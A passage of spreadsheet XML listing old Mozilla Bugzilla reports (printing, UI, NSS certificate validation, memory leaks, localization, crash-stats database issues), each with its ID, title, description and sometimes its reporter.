Wil does that seem right? Or do we have to treat search engines differently (i.e. by not checking their app compatibility at all?). That however would make it more difficult to grab add-on lists with mixed types (search engines and others) from the database because only some of them would need to fulfill the constraint (i.e. INNER JOIN) while others wouldn't.</t>
  </si>
  <si>
    <t>CORE-279298</t>
  </si>
  <si>
    <t>Support for CUPS printer instances</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.5) Gecko/20041113 Firefox/1.0
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.5) Gecko/20041113 Firefox/1.0
Opening the printer dialog while having CUPS support you can choose from a list
of you printers. But some printerns are duplicated. I realized that the extra
duplacates were the configured instances of the printers. But the instance names
are not shown.
Reproducible: Always
Steps to Reproduce:
1.Run Firefox with Postscript prinitng and CUPS installed.
2.Open Print dialog
Actual Results:  
Printers with specified instances are duplicated in printer menu but instance
names are not shown.
Expected Results:  
Instance names are shown in printer menu and when choosing an instance you will
print to it correctly.
Looking at the code the simplest option would be to no include the instances in
the menu. But on the other hand it would only take about 10 rows of code to
support printing to instances.
The code for adding CUPS printers to the printer menu lives in
gfx/src/psshared/nsPSPrinters.cpp
and the code for the actual printing is in gfx/src/ps/nsPrintJobPS.cpp</t>
  </si>
  <si>
    <t>msv</t>
  </si>
  <si>
    <t>SEAMONKEY-210568</t>
  </si>
  <si>
    <t>Double click doesn't work - Right click doesn't work - Save as doesn't work sometimes</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.2.1) Gecko/20021130
Build Identifier: mozilla--1.4rc2-talkbackGecko/
mozilla--1.4rc2-talkbackGecko
Double click doesn't work
Right click doesn't work
Save as doesn't work sometimes
Happens after using it for a while.  Requires restarting to return to normal
Have gone back to Mozilla 1.2.1 as it's more stable and doesn't have these problems.
Reproducible: Sometimes
Steps to Reproduce:
1.Continued use
2.
3.
Actual Results:  
Double click doesn't work
Right click doesn't work
Save as doesn't work sometimes</t>
  </si>
  <si>
    <t>richx7</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-478123</t>
  </si>
  <si>
    <t>[mxr] Multiple trees return |Fatal: Search isn't available|</t>
  </si>
  <si>
    <t>Examples:
...
http://mxr.mozilla.org/spreadfirefox/search
http://mxr.mozilla.org/tamarin-central/search
http://mxr.mozilla.org/webtools-central/search
They all display
{
** Fatal: Search isn't avaliable please complain to the webmaster [cite: bad_glimpseindex]
}
I don't know much about these repositories but that looks wrong.
You may want to check all the other trees too.</t>
  </si>
  <si>
    <t>THUNDERBIRD-494811</t>
  </si>
  <si>
    <t>collapsed-by-default is the wrong default when actions apply to collapsed threads</t>
  </si>
  <si>
    <t>in particular we don't want the collapsed-thread experience to interfere with normal behavior e.g. reading a bunch of mail that just came in which currently is collapsed by default.
collapsing should be an explicit action (left arrow/click-on-twisty).</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-482182</t>
  </si>
  <si>
    <t xml:space="preserve"> Files portion of HTML Complete save process is not localizable</t>
  </si>
  <si>
    <t>Created attachment 366255
fix v1.0
Dave Haas commented way back in the day that it should be but nobody ever got around to it. Since I was cleaning up SaveHeaderSniffer anyway I figured I'd go ahead and fix this while I was at it.
The other changes besides the added line in localizable.strings.in were things Smokey asked me to fix while I was in there just moving things around and the like.</t>
  </si>
  <si>
    <t>SEAMONKEY-147091</t>
  </si>
  <si>
    <t>Excessive window width on opening new URL from another application</t>
  </si>
  <si>
    <t>Running on a 3-monitor system. Browser window normally left maximized to center
monitor. Center monitor is the main one. On double-clicking an URL in Eudora
when Mozilla is not open Mozilla opens a new window set to the total width of
the desktop across all 3 monitors but with the left border at the left of the
center monitor. 
This may be a feature not a bug but I've also noticed with all builds of
Mozilla that I've tried (and Netscape 6.x) that maximizing the window doesn't
set it to full screen but leaves about a 1 space on the right side. I have to
drag the corner of the window to get it to full screen size as I prefer it.</t>
  </si>
  <si>
    <t>johnculp</t>
  </si>
  <si>
    <t>CORE-369413</t>
  </si>
  <si>
    <t>atob() causes ASSERTION: index exceeds allowable range in nsTString.h</t>
  </si>
  <si>
    <t>Steps to reproduce:
  atob(null)
or
  atob()
Result:
  ###!!! ASSERTION: index exceeds allowable range: 'i &lt;= mLength' file ../../dist/include/string/nsTString.h line 133
Filing as security-sensitive because it looks like there is no runtime check to prevent reading past the end of the string.</t>
  </si>
  <si>
    <t>CORE-498010</t>
  </si>
  <si>
    <t>Threads should release their observers when they are shut down</t>
  </si>
  <si>
    <t>Created attachment 383027
Patch v1
[Checkin: Comment 5 &amp; 10]
Threads should release their observers when they are shut down. Leaks and cycles can occur otherwise. Bug 472773 exposed such a case on app-initiated restart.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-71562</t>
  </si>
  <si>
    <t>Last references to Netscape in imapMsgs.properties file</t>
  </si>
  <si>
    <t>There are a few remaining references to Netscape in imapMsgs.properties that
popup as error messages. Here is a list of the error messages' codes:
5016-5019
5022-5023
5025-5026
Should be trivial to fix.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-367112</t>
  </si>
  <si>
    <t>Messages sent by email or newsgroup/usenet do not appear in google group</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 pt-BR rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
Build Identifier: 
Messages sent by email or newsgroup/usenet do not appear in google group for mdc.dev.pt mail list. However messages sent by google group appear normally.
Reproducible: Always</t>
  </si>
  <si>
    <t>leandromerces</t>
  </si>
  <si>
    <t>CORE-292890</t>
  </si>
  <si>
    <t>Investigate interaction of bfcache/fastback and midas</t>
  </si>
  <si>
    <t>At least two possible issues here:
First the editing session is torn down on progress listener notifications and
fastback doesn't restore it.  
So with fastback if a site sets designMode on a document in a frame then the
frame is navigated to another URL and then the user goes back we will have:
1)  No editor hooked up in the frame.
2)  The document thinking an editor is hooked up.
At this point there is no way to reenable designMode for that document due to
item 2 even if the site uses the DOMPageRestore event to do so.
Second editing session teardown messes with things like image animation modes
script enabling etc etc on the document we're leaving.  If fastback also
messes with them we need to ensure the two run in the right order.
Simplest solution (and possibly most correct) may be to disable presentation
caching for HTML documents that have mEditingIsOn testing true.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-522166</t>
  </si>
  <si>
    <t>Add nagios check on free disk space for firefox builds</t>
  </si>
  <si>
    <t>We used to have all the apps in /mnt/netapp/stage with a matching nagios check. Now firefox is split out
 dm-ftp01:/mnt/eql/builds
                      2.0T  1.4T  615G  70% /mnt/eql/builds
 /mnt/eql/builds/firefox
                      2.0T  1.4T  615G  70% /mnt/netapp/stage/archive.mozilla.org/pub/firefox
Please add a nagios check on the free space of /mnt/netapp/stage/archive.mozilla.org/pub/firefox</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-143365</t>
  </si>
  <si>
    <t>unloaded part of bmp image displays black/random garbage</t>
  </si>
  <si>
    <t>The unloaded portion of Windows BitMap images is not displayed as trasparent
rather that portion seems to be filled with some image from the cache or a
solid colour.
The linked page has one example of a windows bitmap which is large enough to
display progressive rendering.</t>
  </si>
  <si>
    <t>vectro</t>
  </si>
  <si>
    <t>FIREFOX-323839</t>
  </si>
  <si>
    <t>Toolbar overflow causes parts of webpage to bounce and the UI to extend beyond the edge of the screen</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060117 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060117 Firefox/1.6a1
When I use the GoogleBar with the search term highlighting turned on it prints each word of the search query as a button on the toolbar. As these buttons extend beyond the edge of the viewable screen the UI extends in an attempt to fit the extended length. However when the window is maximized this causes the scrollbar to move past the edge of the viewable screen. It also causes problems with divs that have relative placement. They start to bounce between their normal position and the position they would be if the screen were wide enough to hold the entire UI.
Reproducible: Always
Steps to Reproduce:
1. Using a toolbar extension cause the items on the toolbar to overflow
2. Observe how the UI extends past the end of the viewable screen.
3. Watch certain divs begin to bounce.
Actual Results:  
Bad Webpage and UI rendering
Expected Results:  
Toolbar buttons cut off gracefully The UI doesn't extend past the edge of the viewable screen and relatively placed divs don't bounce.
Possibly relation to Bug 247116 Bug 316340</t>
  </si>
  <si>
    <t>BUGZILLA-398308</t>
  </si>
  <si>
    <t>Search.pm should not depend on the CGI</t>
  </si>
  <si>
    <t>Right now Search.pm depends on $params being a CGI object and depends on the whole idea that we're running inside a CGI.
Instead it should take normal named arguments. Ideally these named arguments should be extremely simple. Also the boolean chart arguments should be simplified. Something like:
charts =&gt; [
    [ ] [ ] [ ]
]</t>
  </si>
  <si>
    <t>CORE-520820</t>
  </si>
  <si>
    <t>[HTML5] Testcase with alert in mutation handler triggers asserts in HTML5 parser</t>
  </si>
  <si>
    <t>STEPS TO REPRODUCE: Load https://bugzilla.mozilla.org/attachment.cgi?id=350348
ACTUAL RESULTS:
###!!! ASSERTION: Interrupted in the middle of a script?: '!mExecutor-&gt;IsScriptExecuting()' file parser/html/nsHtml5Parser.cpp line 552
EXPECTED RESULTS:  No asserts.
This bug should be kept closed as long as bug 467005 is.</t>
  </si>
  <si>
    <t>THUNDERBIRD-329442</t>
  </si>
  <si>
    <t>fieldMapImport.xul l10n fixes</t>
  </si>
  <si>
    <t>Mark items as .label where needed</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-178637</t>
  </si>
  <si>
    <t>[classic] No focus rect on header field buttons in message compose</t>
  </si>
  <si>
    <t>[This bug is valid for the classic theme only!]
Tabbing through the header fields in the mail/news editor selects alternately
a button and an input field i.e. Reply-To: -&gt; kd-moz@tprac.de -&gt;
Newsgroup: -&gt; de.comm.software.mozilla.
With the modern theme the button gets slightly darker but with the classic
theme you can't recognize anymore where you are! 'Some months ago' there was a
focus rect visible upon the currently selected button.
Expected result: show focus rect on button.
[Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.2b) Gecko/20021103
Win2000 with 32 bit colour depth changing the Windows colour theme does not help.]</t>
  </si>
  <si>
    <t>BUGZILLA-94618</t>
  </si>
  <si>
    <t>passwords with plus character don't work</t>
  </si>
  <si>
    <t>When upgrading from 2.10 to 2.13 one user has a password with a 
plus character.  This password did not work after upgrade.
Reentering this password in editusers.cgi never gave
an error and the user was not able to log in.  Everything is
fine if we use a password without a plus character.
This is probably related to the passwords previously being sent
via GET method where spaces are mapped to plus.  url_decode
of CGI.pl has a tr/+/ / so I tried entering the password
with space instead of + with little success.  I want to
investigate more but won't have time for several days
and believe the release is soon.</t>
  </si>
  <si>
    <t>software</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-700433</t>
  </si>
  <si>
    <t>MathML demo pages: inclusion of HTML fragments in MathML is not valid</t>
  </si>
  <si>
    <t>Follow-up of bug 445029 comment 113
Our demos contain HTML fragments inside MathML code but these inclusions are not valid. This does not seem to be defined anywhere in W3C specs.</t>
  </si>
  <si>
    <t>SEAMONKEY-133015</t>
  </si>
  <si>
    <t>Info may indicate not cached although the page actually is in cache</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Win95 en-US rv:0.9.9) Gecko/20020311
BuildID:    2002031104
Pages marked stale for vary: header handling are displayed as not cached
although they are actually in cache set to force-revalidate not to force-reload.
Reproducible: Always
Steps to Reproduce:
1. Go to the URL given above
2. Examine Page Info
3. Compare with about:cache-entry information
Actual Results:  Page Info displays not cached no expiration set.
Expected Results:  Page Info should display memory or disk cache as the actual
source and must-revalidate or something like that as expiration info.
This might be related to Bug 132957.</t>
  </si>
  <si>
    <t>usch2000</t>
  </si>
  <si>
    <t>BUGZILLA-290252</t>
  </si>
  <si>
    <t>Make test-checksetup able to run on multiple installations</t>
  </si>
  <si>
    <t>Basically we want to have more than one checksetup tinderbox for various purposes.
I should move the file to /usr/local/bin and symlink it into the directories
where it's needed.
I also need to make the name of the DB it runs on configurable. But it can just
pull that out of localconfig so that's what it should do.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-256744</t>
  </si>
  <si>
    <t>Integrate Novell master dependency graph code</t>
  </si>
  <si>
    <t>Tracking bug for integrating Novell's master dependency graph code for XForms.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-352121</t>
  </si>
  <si>
    <t>[nb-NO] Ship Firefox 2</t>
  </si>
  <si>
    <t>MOZILLA.ORG-106603</t>
  </si>
  <si>
    <t>Optimized Builds for Common Platforms</t>
  </si>
  <si>
    <t>It would be nice if I could download optimized builds for Mozilla.
For eg Pentium  Pentuim III  Pentium 4 AMD K6  AMD Athlon etc.
instead of the standard i386 build.
I am sure there will be a noticable perfomance difference. 
This might not be practical for the nightly builds
but it could be done for the milstone releases.
Also people with better processors will feel good about using an optimized build.</t>
  </si>
  <si>
    <t>Lee.Jnk</t>
  </si>
  <si>
    <t>NSS-436599</t>
  </si>
  <si>
    <t>PKIX: AIA extension is not used in some Bridge CA / known certs configuration</t>
  </si>
  <si>
    <t>Here is the PKI configuration:
   Army        Navy
      \      /
       Bridge
         |
        CA1 (with AIA extension to Navy issued Bridge cert only)
         |
        EE1
Entity Army
  Type: Root CA
Entity Navy
  Type: Root CA
Entity Bridge
  Type: Bridge CA
  Issuer1: Army (cert referenced as ArmyBridge below)
  Issuer2: Navy (cert referenced as NavyBridge below)
Entity CA1
  Type: Intermediate CA
  Issuer: Bridge
    AIA extension: Navy issued cert for Bridge
Entity EE1
  Type: End Entity
  Issuer: CA1
---------
The test is to verify the EE1 cert given a list of know certs and a trusted anchor
Case 1:
Known certs: EE1 CA1 Navy
Trusted anchor: Navy
In this case the missing NavyBridge cert is fetched using the AIA extension and the chain is validated.
Case 2:
Known certs: EE1 CA1 ArmyBridge Navy
Trusted anchor: Navy
This case is similar to case #1 except that we provide an extra cert (ArmyBridge). In this case the AIA extension is not used and the validation of the chain fails.
It looks like libpkix is fooled into looking at the Army branch and doesn't go back to the CA1 cert to fetch the NavyBridge cert using the AIA extension.
More details to come...</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-227986</t>
  </si>
  <si>
    <t>EmbedPrompter should use GtkComboBox on gtk+ 2.4</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.0.1) Gecko/20020823 Netscape/7.0
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.0.1) Gecko/20020823 Netscape/7.0
The embed prompt implementation uses a GtkOptionMenu when selecting from a list.
Since gtk+ 2.3.1 GtkOptionMenu is deprecated in favour of GtkComboBox. When
compiled with gtk+ &gt;= 2.3.1 embed prompter should use a GtkComboBox instead.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>BUGZILLA-366593</t>
  </si>
  <si>
    <t>everconfirmed is no longer passed to XML bug files</t>
  </si>
  <si>
    <t>Created attachment 251093
patch v1
This was fixed in bug 316096 but regressed in bug 287325. everconfirmed really belongs to the list of bug fields.
This makes all bugs being moved to another installation to have a status of UNCONFIRMED.</t>
  </si>
  <si>
    <t>CORE-517132</t>
  </si>
  <si>
    <t>Assertion failure at PluginModuleParent.cpp:371</t>
  </si>
  <si>
    <t>When loading this page
I see the failure
[NPAPIPluginChild] Init
LoadPlugin() /home/cjones/mozilla/mp-dbg/dom/plugins/testplugin/libnpipctest.so returned 113b900
[PluginModuleParent] NP_Initialize
[NPAPIPluginChild] AnswerNP_Initialize
[PluginModuleParent] NPP_New
[NPAPIPluginChild] PPluginInstanceConstructor
(plugin args: type=application/x-test-ipc height=200 width=200 )
[NPAPIPluginChild] _getstringidentifier
[NPAPIPluginChild] _utf8fromidentifier
[NPAPIPluginChild] _identifierisstring
[NPAPIPluginChild] _getstringidentifiers
[NPAPIPluginChild] _utf8fromidentifier
WARNING: NS_ENSURE_TRUE(ident) failed: file /home/cjones/mozilla/electrolysis/dom/plugins/PluginModuleParent.cpp line 378
WARNING: NS_ENSURE_SUCCESS(rv 0) failed with result 0x80070057: file /home/cjones/mozilla/electrolysis/dom/plugins/PluginModuleChild.cpp line 698
[NPAPIPluginChild] _getvalue
Before http://hg.mozilla.org/projects/electrolysis/rev/cb6ed6132f0e this caused a nasty crash from the IPDL channel code delete'ing a garbage pointer because of the error return but that's now fixed.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-461228</t>
  </si>
  <si>
    <t>backup bm-xserve01 and then repurpose as 2nd PPC builder slave</t>
  </si>
  <si>
    <t>Summarising a discussion we've had in irc a few times and just had again today. Please update if I missed something:
We dont have duplicate PPC xserves in production. If any one production PPC xserve dies we'll have to close the mozilla1.8 tree and block schedule security releases until we have the replacement PPC xserve configured and ready for use. Apple has discontinued PPC xserves so we cant just buy one.  
To prevent this situation we have another PPC xserve (bm-xserve01) which I believe is idle and which I'd like to setup as a 2nd PPC builder slave. 
afaik during this year bm-xserve01 has been used for:
- partner build repacks. however Kev has now moved repack work to dm-partnerdist01. There are still some files lingering here from those repacks so Kev will manually cleanup and confirm in this bug when all his stuff is off.
- central mac update of all macs. This hasnt been used in last year/two and unclear if it ever worked. Also unclear if it works for only xserves or also for mac minis.
- occasional random mac script testing. This can be done on any other mac like a mac mini or one of our staging xserves. 
I'm filing this bug to see if anyone can think of reason to keep bm-xserve01. If there's no objections we'll go ahead with the backup and repurpose.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-176983</t>
  </si>
  <si>
    <t>irez.com - Site not loaded</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC en-US rv:1.2b) Gecko/20021016
Build Identifier: Mozilla/5.0 (Macintosh U PPC en-US rv:1.2b) Gecko/20021016
The iRez site is not loaded: just a Please wait loading page.
Reproducible: Always
Steps to Reproduce:
1. Load http://www.irez.com/
2. Wait and see
3. Wait wait wait...
Actual Results:  
No more loading the site will never appear!
Expected Results:  
In Internet Explorer after the Please wait the site actually loads.</t>
  </si>
  <si>
    <t>michelebugliaro</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-353862</t>
  </si>
  <si>
    <t>Update pipnss.properties</t>
  </si>
  <si>
    <t>NSS-437804</t>
  </si>
  <si>
    <t>certutil -R for cert renewal should derive the subject from the cert if none is specified.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1.14) Gecko/20080416 Fedora/2.0.0.14-1.fc8 Firefox/2.0.0.14
Build Identifier: nss-3.12.0.3
Certutil has a way to request a certificate with an existing key (#341371). The user must provide the subject which should be optional as it can be obtained from the cert itself. 
Use case: 
certutil -R -s $subject -k $nickname \   #&lt;---- instead of rsa use nickname -y $publicExponent -t $trust_args -d $dir -o $outcsrfile ... other arguments
The -k nickname option enables finding the cert from which the keys are obtained the subject could be obtained from the cert.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>elio.maldonado.batiz</t>
  </si>
  <si>
    <t>THUNDERBIRD-245552</t>
  </si>
  <si>
    <t>default character encoding option for outgoing mail is unusable</t>
  </si>
  <si>
    <t>With the branch zip build (version 0.6+ 20040603) I am not able to change the
default character encoding for outgoing mails. Steps to reproduce:
In Tools-&gt;Options-&gt;Fonts the Outgpoing mail option cannot be viewed/changed. 
See attached screenshot. Tested with new profile.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-121225</t>
  </si>
  <si>
    <t>verschillende veranderingen/idee</t>
  </si>
  <si>
    <t>Onder het kopje 'bestand'
aangeduid met strg+W mijn tekst voorstel: sluiten
aangeduid met strg+Q mijn tekst voorstel : afsluiten
Onder het kopje 'ga naar'
aangeduid met 'about: blank mijn tekst voorstel : 'over: leeg'
In het adresboek onder kaart eigenschappen
aangeduid met 'pieper' mijn voorstel : semafoon
aangeduid met 'departement' mijn voorstel : afdeling
Email en nieuwsgroepen verkeer
aangeduid met 'downloaden' mijn voorstel : ophalen
aangeduid met 'koppen' mijn voorstel : berichten (TW)=&gt; berichtkoppen
(TW): misschien niet mogelijk (draft-&gt;concept? / klad)
aangeduid met 'inbox' mijn voorstel : postvak (TW) ?
nog vertalen: 'templates''sent''trash'
Help|'over het web bladeren': lege stukken
(gemeld door Tom Jansen bewerkt door TW)</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-200536</t>
  </si>
  <si>
    <t>att.net - Error on logout after using att.net webmail client</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4a) Gecko/20030401
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4a) Gecko/20030401
After checking my email at att.net I click on 'logout' and get the following
error message:
Missing Template
The template logout_failed.html is not found.
Please check the location of your template.
Reproducible: Always
Steps to Reproduce:
1.Login
2.View email
3.attempt logout
Actual Results:  
After checking my email at att.net I click on 'logout' and get the following
error message:
Missing Template
The template logout_failed.html is not found.
Please check the location of your template.
Expected Results:  
Returned to login screen
Compliments to codewriters. Some of the web pages at www.eastwind.org will not
print with current version of IE and would not print either with Mozilla 1.3
but the 1.4a release works fine.</t>
  </si>
  <si>
    <t>scottbonacker</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-477887</t>
  </si>
  <si>
    <t>404 on sign-in</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1b3pre) Gecko/20090208 Shiretoko/3.1b3pre
Build Identifier: 0.2.99
I try logging in but get a 404 URL not found.  Sync worked earlier today.
Reproducible: Always
Steps to Reproduce:
1. Try to log in
Actual Results:  
2009-02-10 23:01:11	Chrome.Window	INFO	User string: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1b3pre) Gecko/20090208 Shiretoko/3.1b3pre
2009-02-10 23:01:11	Chrome.Window	INFO	Weave version: 0.2.99
2009-02-10 23:01:11	Service.Util	TRACE	Setting 'Mozilla Services Password' password for user henrik
2009-02-10 23:01:11	Service.Util	TRACE	Setting 'Mozilla Services Encryption Passphrase' password for user henrik
2009-02-10 23:01:11	Service.Main	DEBUG	Logging in user henrik
2009-02-10 23:01:11	Service.Main	DEBUG	Event: weave:service:verify-login:start
2009-02-10 23:01:11	Service.Main	DEBUG	Verifying login for user henrik
2009-02-10 23:01:12	Net.Resource	DEBUG	GET request for https://services.mozilla.com/0.3/user/henrik
2009-02-10 23:01:12	Net.Resource	DEBUG	GET request failed (404)
2009-02-10 23:01:12	Net.Resource	DEBUG	Error response: 
404 Not Found
Not Found
The requested URL /0.3/henrik was not found on this server.
Apache/2.2.3 (Red Hat) Server at sm-weave-proxy01 Port 80
2009-02-10 23:01:12	Service.Main	DEBUG	Event: weave:service:verify-login:error
2009-02-10 23:01:12	Service.Main	DEBUG	Caught exception: Could not GET resource https://services.mozilla.com/0.3/user/henrik (404) (JS frame :: file:///Users/henrik/Library/Application%20Support/Firefox/Profiles/hmunn5r9.default/extensions/%7B340c2bbc-ce74-4362-90b5-7c26312808ef%7D/modules/resource.js :: Res__request :: line 217)
2009-02-10 23:01:12	Service.Main	DEBUG	Event: weave:service:login:error
2009-02-10 23:01:12	Service.Main	DEBUG	Caught exception: Login failed
2009-02-10 23:01:12	Chrome.Window	INFO	Login Error
2009-02-10 23:01:13	Chrome.Login	TRACE	Sync login window closed
Expected Results:  
Successful login</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-504526</t>
  </si>
  <si>
    <t>Add Thunderbird 3.0b3 and 3.0b4pre to crash-stats.m.c</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #479123 +++
Please add Thunderbird 3.0b3 and 3.0b4pre to the crash-stats version list.
Adapted from other bugs the sql should be:
insert into branches(productversionbranch)
values('Thunderbird''3.0b3''1.9.1')</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-346404</t>
  </si>
  <si>
    <t>nsIDOMWindowInternal::Open doesn't tell when the window was diverted into the current tab</t>
  </si>
  <si>
    <t>See bug 344808 comment #15 where we currently use the length of the window's session history (alternatively we probably could also have checked that current window is the new one's opener). Shouldn't there be cleaner way of doing this?</t>
  </si>
  <si>
    <t>BUGZILLA-374632</t>
  </si>
  <si>
    <t>A separate script just to fix file/directory permissions</t>
  </si>
  <si>
    <t>Now that checksetup is localizeable it depends on being able to access the template/ directory. Also setup.cgi looks nicer if it has access to the skins/ directory.
If we can't access the template/ directory checksetup can't even run.
So we need a separate script probably called fix-permissions.pl that just fixes file permissions so that things can be accessed. If we haven't created a localconfig yet it should just act like we have a blank webservergroup which makes sense.
Also we can run that on a Bugzilla tarball when we build it so that permissions will be the no webservergroup permissions by default. (Which probably won't matter too much but hey.)</t>
  </si>
  <si>
    <t>SEAMONKEY-463917</t>
  </si>
  <si>
    <t>adding ka (Georgian) for Seamonkey all-locales</t>
  </si>
  <si>
    <t>Georgian l10n landed to Mercurial.
wonder for opportunity to find bugs while [trying to] build it via hg.</t>
  </si>
  <si>
    <t>giasher</t>
  </si>
  <si>
    <t>SOCORRO-488402</t>
  </si>
  <si>
    <t>Production Socorro topcrashbyurlfacts table add unique constraint and remove duplicates</t>
  </si>
  <si>
    <t>In the last 2 days the topcrashbyurlfacts grew by 35x. The mtbffacts table experience similar exponential growth.
We need to add unique constraint to topcrashbyurlfacts on
day productdims_id urldims_id and signaturedims_id
We need to add unique constraint to mtbffacts on
day productdims_id
In order to do this we will probably need to cleanup the data first then add the constraints.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-470617</t>
  </si>
  <si>
    <t>Please hide blockingâ€‘thunderbird3.0b1 flag</t>
  </si>
  <si>
    <t>We've shipped 3.0b1 so it's time to hide the flag from the people who think we'll invent a time-machine *and* fix their bug before b1.
(I don't think we ever quite decided whether we liked our request blocking b1 and we'll grant blocking 3.0 and set a target milestone instead of granting what you requested approach so I'm not asking for a new b2 flag: someone can do that in a separate bug if we did want another one.)</t>
  </si>
  <si>
    <t>NSPR-454878</t>
  </si>
  <si>
    <t>PR_GetPhysicalMemorySize sometimes returns incorrect result on Mac</t>
  </si>
  <si>
    <t>We tracked down bug 454587 to as far as we can tell PR_GetPhysicalMemorySize returning 0 every so often.  When this happens we end up creating a 0-size memory cache (as well as not creating the right size for some of the Places caches during startup etc).  The problem happens particularly often if PR_GetPhysicalMemorySize is called twice within a short period of time (which is what happens during startup) but it seems to be happening in some other cases too (which causes the test failure in question).
The relevant (Mac-specific) code is:
302     struct host_basic_info hInfo
303     mach_msg_type_number_t count
304 
305     int result = host_info(mach_host_self()
306                            HOST_BASIC_INFO
307                            (host_info_t) &amp;hInfo
308                            
309     if (result == KERN_SUCCESS)
310         bytes = hInfo.memory_size
and it looks like things fail when |result| is not KERN_SUCCESS.  In fact in my tests it's often 5 (which is the generic KERN_FAILURE value).
Requesting blocking since this has some pretty serious performance implications: we end up creating memory caches that are completely the wrong size in various places.
Not sure who we have around who'd be able to do something with this... shaver any ideas for a Mac guru?</t>
  </si>
  <si>
    <t>TOOLKIT-426544</t>
  </si>
  <si>
    <t>Disable browser.download.manager.alertOnEXEOpen and set internet zone bit on all downloaded files</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9b4) Gecko/2008030714 Firefox/3.0b4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9b4) Gecko/2008030714 Firefox/3.0b4
The security warning for opening exes borrowed from IE6 SP2 should be reverted to the Firefox 2 for various reasons:
- Depends on Windows version (XP Vista / no SP SP1 SP2) and IE version. A browser should not depend on another one!
- Can not be disabled from the warning box itself in contrast to the Firefox 2 warning. (The check box in the IE box only disables it for one file)
- The only way to disable it is in the IE settings Dialog box! Changing settings for Firefox using the IE settings dialog box is completely ironic and not user friendly.
- People who uninstalled IE with a program such as XPLite (Like me) are not able to change the setting! Uninstalling IE is not a too rare thing among Mozilla fans.
Please reconsider the warning box or implement it in a way which is less dependent on IE.
Reproducible: Always</t>
  </si>
  <si>
    <t>LIJI32</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-256968</t>
  </si>
  <si>
    <t>Minor mismatch between table of contents and section headers in Firefox help</t>
  </si>
  <si>
    <t>In the For IE Users section of Firefox help the section headers don't match
the equivalent contents table entries.
Table of Contents:
 and Internet Explorer Terminology Differences
's Features
Section Titles:
 and Internet Explorer Terminology Differences
's Features
Apologies if this is deliberate.</t>
  </si>
  <si>
    <t>CORE-391890</t>
  </si>
  <si>
    <t>leaks from pixman_rect_alloc within _cairo_gstate_clip drawing borders</t>
  </si>
  <si>
    <t>When I start Firefox with about:blank and quit I see 7 8-byte allocations leaked like the following:
12230670  (8)
        0x00000000
        0x00000000
allocData[thebes +0x6A937]
pixman_rect_alloc[thebes +0x6B5FE]
_moz_pixman_region_init_rects[thebes +0x6E0CB]
_cairo_region_init_boxes[thebes +0x4A572]
_cairo_traps_extract_region[thebes +0x5BFDE]
_cairo_clip_intersect_region[thebes +0x4E035]
_cairo_clip_clip[thebes +0x4DF18]
_cairo_gstate_clip[thebes +0x4CF7A]
_moz_cairo_clip_preserve[thebes +0x335B5]
gfxContext::Clip[thebes +0xA2E3]
DrawBorders[gklayout +0x41E11]
nsCSSRendering::PaintBorder[gklayout +0x4128C]
...
If I load the default minefield start page rather than about:blank there are an additional 24 such allocations leaked.
(I'm using trace-malloc on Windows not quite all the patches needed for it are checked in yet.)</t>
  </si>
  <si>
    <t>FIREFOX-361061</t>
  </si>
  <si>
    <t>params added nsISearchEngine::addParam() are sometimes forgotten after a restart (especially for engines added without icons)</t>
  </si>
  <si>
